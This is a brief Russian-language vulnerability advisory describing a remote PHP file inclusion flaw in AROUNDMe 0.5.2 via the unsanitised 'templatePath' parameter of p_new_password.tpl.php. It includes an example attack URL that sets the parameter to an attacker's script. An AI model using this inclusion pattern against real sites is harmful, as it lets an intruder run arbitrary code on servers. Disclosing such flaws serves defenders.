Программа: AROUNDMe 0.5.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "templatePath" сценарием p_new_password.tpl.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://www.site.com/[path]/template/barnraiser_01/ p_new_password.tpl.php?templatePath=[Evil_Script]



Оставить мнение